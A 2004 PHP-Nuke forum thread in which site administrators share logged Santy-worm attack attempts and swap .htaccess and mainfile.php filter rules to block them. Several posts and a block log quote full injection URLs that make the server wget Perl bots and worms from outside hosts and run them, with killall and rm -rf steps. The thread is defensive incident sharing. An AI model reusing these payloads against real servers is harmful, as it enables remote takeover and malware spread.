You are missing our premiere tool bar navigation system! Register and use it for FREE!

NukeCops  
•  Home •  Downloads •  Gallery •  Your Account •  Forums • 
Readme First
- Readme First! -

Read and follow the rules, otherwise your posts will be closed
Modules
· Home
· FAQ
· Buy a Theme
· Advertising
· AvantGo
· Bookmarks
· Columbia
· Community
· Donations
· Downloads
· Feedback
· Forums
· PHP-Nuke HOWTO
· Private Messages
· Search
· Statistics
· Stories Archive
· Submit News
· Surveys
· Theme Gallery
· Top
· Topics
· Your Account
Who's Online
There are currently, 227 guest(s) and 0 member(s) that are online.

You are Anonymous user. You can register for free by clicking here
Nuke Cops :: View topic - visualcoders.net hacking attempts [ ]
 Forum FAQ  •  Search  •   •  Memberlist  •  Usergroups   •  Register  •  Profile •    •  Log in to check your private messages  •  Log in

 
Post new topic  Reply to topicprinter-friendly view
View previous topic Log in to check your private messages View next topic
Author Message
kjcdude
Captain
Captain


Joined: Jun 10, 2003
Posts: 441

Location: Southern California

PostPosted: Sat Dec 25, 2004 2:54 am Reply with quoteBack to top

There have been many hacking attempts by http://www.visualcoders.net/ in the past day or so.

Here is the string they will try and use.

Code:
modules.php?name=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt


Luckly NukeSentinel has caught all attempts and has baned those ip's

Just thought you all would like to know.

Also, many of us have posted on visualcoders.net forums with our complaints.
http://www.visualcoders.net/viewforum.php?f=10

_________________
Diablo Heat | The OC Sucks [b]Hot or Not[/b] | TheOCSucks.com The OC Sucks
Find all posts by kjcdudeView user's profileSend private messageSend e-mailVisit poster's websiteAIM AddressMSN Messenger
br212
Nuke Soldier
Nuke Soldier


Joined: Feb 29, 2004
Posts: 15


PostPosted: Sat Dec 25, 2004 2:59 am Reply with quoteBack to top

--


Last edited by br212 on Sun Jan 16, 2005 1:09 pm; edited 1 time in total
Find all posts by br212View user's profileSend private message
Guidyy
Sergeant
Sergeant


Joined: Sep 01, 2003
Posts: 77


PostPosted: Sat Dec 25, 2004 4:37 am Reply with quoteBack to top

Got same Rainbow Brite on my website:
one with an american IP, the other with a dutch IP.
Code:
http://www.yummyfood.net/index.php?name=Your_Account&op=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt

IPs
66.221.32.128
217.170.21.119

Guido
http://www.yummyfood.net
http://www.guidyy.com
Find all posts by GuidyyView user's profileSend private message
Mesum
Support Staff
Support Staff


Joined: Mar 11, 2003
Posts: 842

Location: Chicago

PostPosted: Sat Dec 25, 2004 10:53 am Reply with quoteBack to top

But that website has been suspended already.

_________________
Only FREE Dating site for Desis.
Find all posts by MesumView user's profileSend private messageVisit poster's websiteAIM AddressYahoo MessengerMSN Messenger
kipuka
Sergeant
Sergeant


Joined: Dec 19, 2003
Posts: 105


PostPosted: Sat Dec 25, 2004 11:52 am Reply with quoteBack to top

This appears to be the "Santy" worm. Someone claimed he upgraded to phpbb 2.0.11 and is still having problems w/ exploitation. The decoded version of the "Santy" GET string he provided looks the same as what you posted here. http://securityfocus.com/archive/1/385462/2004-12-22/2004-12-28/0

Apparently, these jerks are fishing around now using Google for other PHP scripts. With the source code out there, we'll probably see other copycats.
http://securityfocus.com/archive/1/385463/2004-12-22/2004-12-28/0
Find all posts by kipukaView user's profileSend private message
VinDSL
Site Admin
Site Admin


Joined: Jul 08, 2003
Posts: 1193

Location: Arizona (USA) Site Admin: Lenon.com Admin: Disipal Designs

PostPosted: Sat Dec 25, 2004 1:22 pm Reply with quoteBack to top

kjcdude wrote:
Here is the string they will try and use.

Code:
modules.php?name=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt


Just thought you all would like to know.


Decoded:

Code:
modules.php?name=http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;wget www.visualcoders.net/spybot.txt;wget www.visualcoders.net/worm1.txt;wget www.visualcoders.net/php.txt;wget www.visualcoders.net/ownz.txt;wget www.visualcoders.net/zone.txt;perl spybot.txt;perl worm1.txt;perl ownz.txt;perl php.txt

_________________
.:: "The further in you go, the bigger it gets!" ::.
.:: VinDSL's Lenon.com | The Disipal Site ::.
Find all posts by VinDSLView user's profileSend private messageVisit poster's websiteICQ Number
Raven
General
General


Joined: Mar 22, 2003
Posts: 5233

Location: USA

PostPosted: Sat Dec 25, 2004 7:08 pm Reply with quoteBack to top

If you use .htaccess, just add these lines:

RewriteCond %{REQUEST_URI} ^visualcoders [NC]
RewriteRule ^.*$ emailsforyou.php [L]

Of course the RewriteRule can be whatever you want.

_________________
Those who hear not the music think the dancers mad.
Raven Web Hosting|My Scripts & Stuff
Find all posts by RavenView user's profileSend private messageVisit poster's website
sixpack
Lieutenant
Lieutenant


Joined: Oct 20, 2004
Posts: 165


PostPosted: Sat Dec 25, 2004 9:25 pm Reply with quoteBack to top

Thanks for that Very Happy We have been getting something very close:

Code:
modules.php?...&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20killall%20-9%20perl;cd%20/tmp;rm%20-rf%20ssh.*;rm%20-rf%20bot*;wget%20grancassa.co.uk/images/botd;perl%20botd;wget%20grancassa.co.uk/images/ssh.d;perl%20ssh.d;rm%20-rf%20ssh.*;rm%20-rf%20bot*%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527


I have added the above posted .htaccess addition as well as the following:

Code:
RewriteCond %{REQUEST_URI} ^grancassa [NC]
RewriteRule ^.*$ emailsforyou.php [L]


Seems there is a php-Grinch on the loose.. will this addition to the .htaccess work for the query string we are seeing?
Find all posts by sixpackView user's profileSend private message
Zhen-Xjell
Nuke Cops Founder
Nuke Cops Founder


Joined: Nov 14, 2002
Posts: 5939


PostPosted: Sat Dec 25, 2004 11:06 pm Reply with quoteBack to top

Although the code by Raven will work, it is not enough. There are other URLs which are used:

http://castlecops.com/article-5640-nested-0-0.html

You cannot filter on URL alone, because URLs change. I've also noticed others filtering on "echr", which is also invalid logic. The link above explains it all in the comments section.

Please be aware of how you are filtering. Because you could be applying a false sense of security.

_________________
Paul Laudanski, Microsoft MVP Windows-Security
CastleCops: [de] [en] [wiki]
Find all posts by Zhen-XjellView user's profileSend private messageSend e-mailVisit poster's website
sixpack
Lieutenant
Lieutenant


Joined: Oct 20, 2004
Posts: 165


PostPosted: Sun Dec 26, 2004 12:15 am Reply with quoteBack to top

ok now i am getting worried.. what would be the best way to block this?.. i have read the posts in the links and from what i see it woud be a entry in .htaccess that is:
Code:
RewriteCond %{REQUEST_URI} ^&rush=%65 [NC]
RewriteRule ^.*$ emailsforyou.php [L]


because that variable is in every blocked script attack that we have received?

Sorry, just trying to find a definitave solution because this is the 15th script abuse logged.
Find all posts by sixpackView user's profileSend private message
VinDSL
Site Admin
Site Admin


Joined: Jul 08, 2003
Posts: 1193

Location: Arizona (USA) Site Admin: Lenon.com Admin: Disipal Designs

PostPosted: Sun Dec 26, 2004 12:16 am Reply with quoteBack to top

Zhen-Xjell wrote:
You cannot filter on URL alone, because URLs change...

Gotta agree with that!

I've been pouring over my logs and noticed a lot of Santy variants, forked
from the original exploit. These particular ones all have a '&rush=' string in
them.

For these variants, I apply the following directive:

Code:
RewriteCond %{QUERY_STRING} rush=([^&]+) [NC]
RewriteRule ^.*$ emailsforyou.php [L]

I ran an exploit against myself, and it catches it... Wink

_________________
.:: "The further in you go, the bigger it gets!" ::.
.:: VinDSL's Lenon.com | The Disipal Site ::.
Find all posts by VinDSLView user's profileSend private messageVisit poster's websiteICQ Number
kjcdude
Captain
Captain


Joined: Jun 10, 2003
Posts: 441

Location: Southern California

PostPosted: Sun Dec 26, 2004 12:22 am Reply with quoteBack to top

I am at 36 blocked attempts so far

I got a new variant in the script, at least it looks like it

Code:
modules.php?name=http://midomain.false.ca/~pillar/.zk/php.gif?&cmd=cd%20/tmp;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611113;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20sess_189f0f0889555397a4de5485dd611112;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611114;rm%20-rf%20sess_189f0f0889555397a4de5485dd611113.*%20sess_189f0f0889555397a4de5485dd611114.*%20sess_189f0f0889555397a4de5485dd611112.*;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/var/tmp/;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/var/spool/mail/;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/var/mail/;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/usr/local/apache/proxy/;cd%20/var/tmp/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;cd%20/var/spool/mail/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;cd%20/var/mail/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;cd%20/usr/local/apache/proxy/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;rm%20-rf%20/tmp/sess_189f0f0889555397a4de5485dd611111*%20/var/tmp/sess_189f0f0889555397a4de5485dd611111*%20/var/spool/mail/sess_189f0f0889555397a4de5485dd611111*%20/var/mail/sess_189f0f0889555397a4de5485dd611111*%20/usr/local/apache/proxy/sess_189f0f0889555397a4de5485dd611111*

_________________
Diablo Heat | The OC Sucks [b]Hot or Not[/b] | TheOCSucks.com The OC Sucks

Last edited by kjcdude on Sun Dec 26, 2004 12:28 am; edited 1 time in total
Find all posts by kjcdudeView user's profileSend private messageSend e-mailVisit poster's websiteAIM AddressMSN Messenger
MGCJerry
Elite Nuker
Elite Nuker


Joined: Jun 16, 2003
Posts: 220


PostPosted: Sun Dec 26, 2004 6:02 am Reply with quoteBack to top

I've had my share of them too... 48 since the 24th.

http://www.2thextreme.org/test.php

_________________
Original creator of
* Fetch Mod
* RPG Races Module
* 2 The Xtreme Theme
Find all posts by MGCJerryView user's profileSend private message
Zhen-Xjell
Nuke Cops Founder
Nuke Cops Founder


Joined: Nov 14, 2002
Posts: 5939


PostPosted: Sun Dec 26, 2004 6:12 am Reply with quoteBack to top

In the span of 5 minutes yesterday, http://castlecops.com had over 600 attacks. Over yesterday's course, it had on average one attack per second. I've got 10s of thousands of IPs as sources (uniq IPs that is).

The filter on "rush" is a stop gap measure. You are filtering on variables that exist today in the worm, which can be easily modified.

Point is, even though it is OK to filter on highly used terms like "visualcoders" or "...rush..." as per above, these can and are in fact being changed in new variations.

You need a better solution, one that involves the tick mark, and one that involves ":/". Reasoning was explained in the article's comments:

http://castlecops.com/article-5640-nested-0-0.html

However, another possible help is ensuring you filter out the tick in mainfile.php:

Simply add this line into the HTTP_GET_VARS block:

(eregi("'", $secvalue)) ||

Just in case it doesn't work, add a slash (I didn't check since I use other techniques):

(eregi("\'", $secvalue)) ||

Always aim for catch-all solutions. Otherwise, the security you implement is limited. Then again, don't implement solutions that aren't solutions, like filtering on "echr", since that doesn't really catch the real issue all the time: "chr".

_________________
Paul Laudanski, Microsoft MVP Windows-Security
CastleCops: [de] [en] [wiki]
Find all posts by Zhen-XjellView user's profileSend private messageSend e-mailVisit poster's website
lizard
Corporal
Corporal


Joined: Aug 07, 2003
Posts: 61


PostPosted: Sun Dec 26, 2004 6:48 am Reply with quoteBack to top

Hi im getting hundreds and hundreds of attempts on my site www.bittersweetembrace.co.uk


some 600 or so since the 24th

protector and sentinel etc seem to be catching them coz im getting hundreds of emails telling me scripts have been blocked .. unfortunatly i dont have a great understanding of php etc .. what in laymans terms can i do to stop this all together ?

heres the latest warning email

Date & Time: 2004-12-26 09:40:38
Blocked IP: 84.135.*.*
User ID: Anonymous (1)
Reason: Abuse-Script
--------------------
User Agent: LWP::Simple/5.800
Query String: bittersweetembrace.co.uk/modules.php?name=Forums&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20killall%20-9%20perl;cd%20/tmp;wget%20grancassa.co.uk/images/bot;perl%20bot;wget%20grancassa.co.uk/images/ssh.a;perl%20ssh.a;rm%20-rf%20ssh.*;rm%20-rf%20bot*%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527
Forwarded For: none
Client IP: none
Remote Address: 84.135.179.174
Remote Port: 41691
Request Method: GET
Find all posts by lizardView user's profileSend private message
Display posts from previous:      
Post new topic  Reply to topicprinter-friendly view
View previous topic Log in to check your private messages View next topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum



Powered by phpBB © 2001, 2005 phpBB Group

Ported by Nuke Cops © 2003 www.nukecops.com
:: FI Theme :: PHP-Nuke theme by coldblooded (www.nukemods.com) ::
Powered by TOGETHER TEAM srl ITALY http://www.togetherteam.it - DONDELEO E-COMMERCE http://www.DonDeLeo.com - TUTTISU E-COMMERCE http://www.tuttisu.it
Web site engine's code is Copyright © 2002 by PHP-Nuke. All Rights Reserved. PHP-Nuke is Free Software released under the GNU/GPL license.
Page Generation: 0.049 Seconds - 497 pages served in past 5 minutes. Nuke Cops Founded by Paul Laudanski (Zhen-Xjell)
:: FI Theme :: PHP-Nuke theme by coldblooded (www.nukemods.com) ::